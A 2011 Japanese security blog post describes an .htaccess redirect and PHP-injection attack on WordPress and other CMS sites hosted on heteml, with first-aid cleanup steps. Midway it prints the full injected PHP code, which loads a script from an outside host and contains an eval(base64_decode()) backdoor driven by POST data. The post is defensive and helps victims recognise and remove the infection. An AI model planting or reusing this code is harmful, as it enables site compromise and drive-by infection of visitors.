わかる!ウイルス対策|セキュリティソフト30日無料比較

WordPressサイト改ざん.htaccessリダイレクトアタック被害の応急処置方法〜ヘテムル利用者で被害拡大

先日の記事CMSを使ったWEBサイトを狙う.htaccessリダイレクトアタックというwebサイト改ざん被害が後を絶たず、レンタルサーバーへテムル利用者の多くの方からお問い合わせをいただいたため、ここに一応の応急処置を書き記します。

あくまでもこれはウイルス配布サイトへのリダイレクトを一時的に阻止するだけの応急処置です。

正確な原因は不明です。以下の処方は、あくまでも鎮痛剤のような一時的な対処にすぎません。

2011年11月25日各所記事訂正 当初phpmyadminが原因と判断していましたが、wordpressのプラグインの脆弱性を狙った不正な攻撃と判断し各所訂正を行いました。hetemlのデータベースサーバーは公開サーバーとは別になっているためphpmyadmin経由でのリスクは可能性としては限りなく少ないものです。

つまり利用するサーバーの問題ではなくCMSに追加したプラグインにはリスクが有るため世の中の全ての公開サーバーでも同様のリスクが有るという内容になります

本来の対策はサイトをまるごと別サーバーへ移転するなどの対策が必要ですが、多数のサイトを扱う方などには骨の折れるサーバー移転作業の前に応急処置でリダイレクトを防ぎましょう。

.htaccessリダイレクトアタック被害の状態(Wordpress)

今回お声を聞かせていただいた多くのサイト(数百件)がすべてWordpressやZenphotoなどを同一サーバーの管理領域にもたれている方からでした。

被害の様子をヘテムルのFTPソフトを介した画面で説明します。

 

2011-11-24_14-12-10.jpg

 

Filezillaの画面からです。

この赤い枠で囲んだtmpxxxxxxx.phpというファイル

w数字xxxxxxx.php

index.php.htm


など数種類の見知らぬファイルも後日生成される。(追記)

このような見知らぬファイルが生成されています。

これがphpmyadminを操作して生み出されるファイルです。

被害の実態はヘテムルの提供するphpmyadmin2.11.1.xという低いバージョンの脆弱性を狙った物で詳細は割愛しますが、このように各公開用サーバーの各ドメインのフォルダ内にphpファイルが存在すれば(wordpressに限らず)こういったphpファイルがサーバー内の至る所に(上の階層から下の階層まで)無数に生成されます

※注意 被害原因はphpmyadminが原因では有りませんでした。Wordpressのプラグインに存在する脆弱性を狙った物で、Ajaxファイルマネージャーを不正に狙ったものではないかと推測されています。

これ、

消しても消しても勝手に毎日生み出されます。

そして。これらのファイルなどにより.htaccessが書き換えされます。

 

2011-11-24_14-12-56.jpg

 

このようにパーミッションが444となっています。

普段は644や604になっているかと思いますが、この4xx状態では上書きできません。

リダイレクトを防ぐためにこの.htaccessを削除してもまた自動的に生成されるため対策にはなりません。

なのであえて上書きし直して保存しておくことがこの.htaccessリダイレクトアタックに対する最大の対策となります。

サーバー上で一旦644など上書きできる状態にしてから書き換えましょう。

そして再度アップロードした際に400や404などに属性変更しておく

.htaccessはダウンロードしてみてみればわかりますがぱっと見は元の状態と似ていますが、数百行の改行の下にリダイレクトのコードが書き記されていますのでこちらの記事を参照ください。

.htaccessリダイレクトアタックの被害実例

 

あくまでもこれは応急処置です

なぜならば

この攻撃はサーバー内部全てのphpファイルを書き換えするものであるから

以下のようにワードプレスを使ったサイトの場合

数千個、複数のサイトの場合は数万個のphpファイルが存在することでしょう。

このphpmyadminの被害に遭うとそのデータベースに接続するサイトが存在するサーバー内部

全てのフォルダ(管理権限が届くところまで)が書き換え改ざんの被害に遭います。

※記事訂正 phpmyadminが原因と特定するものではありません

2011-11-24_14-14-05.jpg

 

全てのphpファイルは

出だしの部分の

<?php

といった書き出しがあると思います。

その書き出し直後が以下のように汚染されます。

 

2011-11-24_14-15-00.jpg

 

今回、筆者が対策を施したサーバーにはこういったファイルが数十万個存在しました。

書き換えられた内容は

global $sessdt_o; if(!$sessdt_o) { $sessdt_o = 1; $sessdt_k = “lb11”; if(!@$_COOKIE[$sessdt_k]) { $sessdt_f = “102”; if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo “<script>document.cookie='”.$sessdt_k.”=”.$sessdt_f.”‘;</script>”; } } else { if($_COOKIE[$sessdt_k]==”102″) { $sessdt_f = (rand(1000,9000)+1); if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo “<script>document.cookie='”.$sessdt_k.”=”.$sessdt_f.”‘;</script>”; } $sessdt_j = @$_SERVER[“HTTP_HOST”].@$_SERVER[“REQUEST_URI”]; $sessdt_v = urlencode(strrev($sessdt_j)); $sessdt_u = “http://turnitupnow.net/?rnd=”.$sessdt_f.substr($sessdt_v,-200); echo “<script src=’$sessdt_u’></script>”; echo “<meta http-equiv=’refresh’ content=’0;url=http://$sessdt_j’><!–“; } } $sessdt_p = “showimg”; if(isset($_POST[$sessdt_p])){eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));exit;} }

 

このようになっています。

Windowsユーザーの場合は一括書き換えソフトgrep replaceやdevasなどで全てのデータをダウンロードして一括置き換えなどの処理を施す。

この上書きで消毒したファイルは全てを使うには危険さが残りそうですが、サーバー移転後に使える場合が多いのでやっておくことをおすすめします。

 

なぜ今回hetemlレンタルサーバーでこのような大きな被害が拡大したのでしょうか?

Google検索による heteml phpmyadmin管理ページが上位表示されていることも原因のひとつかもしれません。

hetemlのphpmyadminが原因ではないと判断いたしましたので記事訂正。

へテムルで簡単インストールできるCMS一覧

ワードプレス

Movabletype

Zenphoto

などなど、構成に使われる全てのphpファイルが改ざんされますので一度チェックしてみるべきでしょう。

とりあえず、この.htaccessリダイレクトアタックの被害に遭われた場合

サーバー移転が最終手段ですが、多くのサイトを管理するwebマスターの方には骨の折れる作業になります。

なので、気づいた際は取り急ぎリダイレクト(悪意のウイルス配布サイトへのリダイレクト)を防御する処置をほどこしておきましょう。

サーバー移転作業はそれからでも大丈夫です。

ただし、phpファイルが全て汚染されているためワードプレスのサイトの場合などサイトアクセス時に一瞬CSSの読み込みに時間がかかり文字化けするような現象が発生します。

つまり、他人事のように見ているあなたのサイトもアクセスした瞬間、一瞬の文字化けが存在するのなら、サーバーにアップされている全てのファイルをチェックするべきでしょう。

なお、作業寺に各種サーバーやwebサイトへアクセスする場合はパソコン本体もしっかりとしたウイルス対策ソフトを導入しておきましょう。

飛ばされて感染しないように。

なお、レンタルサーバーheteml利用者の方にはこういった事例も含め不正改ざんに対する対策法を記載したページがありますので参考にしてください。

http://heteml.jp/pages/security/

結局のところ原因は不明です。

.htaccessのパーミッションを変えたところで、また上書きが発生する場合もあり、そうでない場合もあります。

 

 

今回の調査のために用意したウイルス対策環境

Windowsウイルス対策ソフト Eset Smart security

Mac用ウイルス対策ソフト Eset cybersecurity for Mac

2014年以降のWindows XP未更新に強いセキュリティソフト

【Windows】【 Mac】【Android】全て対応

動作の軽さで選ばれて評価ナンバー1
ESET無料体験版

【Windows】【 Mac】【Android】全て対応

安定の人気ソフトといえばVB
ウイルスバスタークラウド無料体験

5件のコメント

  1. WordPressサイト改ざん.htaccessリダイレクトアタック被害の応急処置方法〜ヘテムル利用者で被害拡大

    先日の記事CMSを使ったWEBサイトを狙う.htaccessリダイレクトアタックというwebサイト改ざん被害が後を絶たず、レンタルサーバーへテムル利用者の…

  2. 無料CMSの危険性とガンブラー感染事例 htaccessを不正操作しウイルス配布サイトへ誘導Zenphotoとphpmyadminの脆弱性に注意

    2011年11月10日に起きた事例 共用レンタルサーバー ヘテムル(heteml)からの通知によると写真管理用無料CMS Zenphotoの低いバージョン…

  3. ウイルスソフト人気ランキング2012 WEBサイト改竄に対策を!総括TOP5

    2011年度のインターネットおよびパソコン環境における脅威はローカルのパソコンに侵入するガンブラーウイルスやwebサーバーに置かれたCMSなどの脆弱性を狙…

  4. i6i6! より:

    MT5で使えるリッチテキストエディタCKEditorをインストール

      CKEditor MT5で使えるリッチテキストエディターCKEditor。 (実は昨年11月頃 サーバー内まるごとハッキングされる事故に遭…

  5. […] (実は昨年11月頃 サーバー内まるごとハッキングされる事故に遭遇していたのでしたw。まだ続いてるけど、MTは復旧面倒なので移転しました。WPは犯されても上書き更新で修正できるのでそのままヘテムルに放置)参考:へテムルWEBサイト改ざん […]

]